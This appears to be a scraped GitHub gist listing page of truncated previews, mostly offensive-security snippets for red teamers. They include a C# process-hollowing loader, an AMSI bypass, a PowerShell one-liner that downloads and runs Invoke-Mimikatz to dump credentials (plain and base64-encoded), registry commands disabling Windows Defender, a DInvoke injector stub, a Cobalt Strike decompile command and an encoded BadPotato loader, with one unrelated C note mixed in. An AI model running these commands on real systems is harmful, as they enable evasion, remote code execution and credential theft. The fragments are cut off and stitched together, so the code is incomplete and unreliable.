This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*************** | |
* Simple Process Hollowing in C# | |
* | |
* #Build Your Binaries | |
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
* | |
* @author: Michael Gorelik <smgorelik@gmail.com> | |
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
* #Most of the code taken from here: @github: github.com/ambray |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70 | |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# AMSI Bypass (Matt Graeber) | |
Normal Version | |
------------------------ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
#mimikatz [local] | |
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; | |
#encoded-mimikatz [local] | |
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQ |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-Mimikatz | |
{ | |
<# | |
.SYNOPSIS | |
This script leverages Mimikatz 2.2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as | |
dump credentials without ever writing the mimikatz binary to disk. | |
The script has a ComputerName parameter which allows it to be executed against multiple computers. | |
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
java -cp .\java-decompiler.jar org.jetbrains.java.decompiler.main.decompiler.ConsoleDecompiler -dgs=true .\cs_bin\cobaltstrike.jar .\cs_src\ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
C | |
const | |
static | |
static const 区别 | |
*/ | |
const 表示常量,存储在静态存储区。 | |
static 修饰变量 仅作用在当前文件内 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace DinjectorWithQUserAPC | |
{ | |
public class Program |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Related to MalwareBytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat | |
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-BadPotato | |
{ | |
[CmdletBinding()] | |
Param ( | |
[String] | |
$Command = "whoami" | |
) | |
$a=New-Object IO.MemoryStream(,[Convert]::FromBAsE64String("H4sIAAAAAAAEAMy9CXxb1ZU4fN+T9PQk27Ikb3Jix3JiJ4pjO7LlTUASy5KcOPEW29lIwFFsJRaxJSHJ2RyDUygFCgVKW7YypdCFtpSBLlBoSynd2ylLS1uYgQy0nUKZdqa0/VM6heQ759z3np68BNpv/t/vi/POveecu5x77rnnnnufZPddeCMzMMaM8Jw9y9hXGP/Xyd753xw8tqpHbexLlh9Xf0Xo/XH1yEQs7U6mEodSkSn3WCQeT2TcB6Lu1HTcHYu7QwPD7qnEeLSxoMBao7QxGGasVzCw5d9fP6q2+xJbyfIEL2MvACJzWvxZAG7MCVw6zItcbsayKesUiI7/DKzzvYzZ6X821RL6VwHtDjDe7n2mRQbpFlj+u9DFwnqa6PRPBnyLDm/MRI9lIG35N16WxiouaGJ/YyqdGoM8lw3GJkFyOrdcJ/xvTEUnE1AwX5GZ2vr1gnJd88UcfJanW6h7E/vKdsbG38O1rPT2d/0r8lrYOonqOtJXQgPWFGSTHhdjVvEDsbL1eakfigpe5xTOlBRBv55ywAqchtSryFoGSH7qd5BN5RtYUvYsB4KnAgHWSnUCMRUH4KkEVPasyGFLukpusOzO0iqrG6eCQKlT8IAmpdkZMBlpBuFlVVgVdG317wJW6jps/tsAOPu6ZhgM7wObT18GtYuMTtOZEtClSJWLJIcx9RtVIOrZKRU7TaWJOSi82iHpungRDNVhdEhu1FDp/GGUJkD1Usn5txpVQf4IwCHNE0I6I4FhS+lqFGglgNrEKhzu1aDMRA1204EN9BsVRadrUUqzbrzzgMPsMCdWY/NmlDh1NdZck6v2h4AGpTy52 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
namespace Hollowing | |
{ | |
public class Loader | |
{ | |
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe"); |
OlderNewer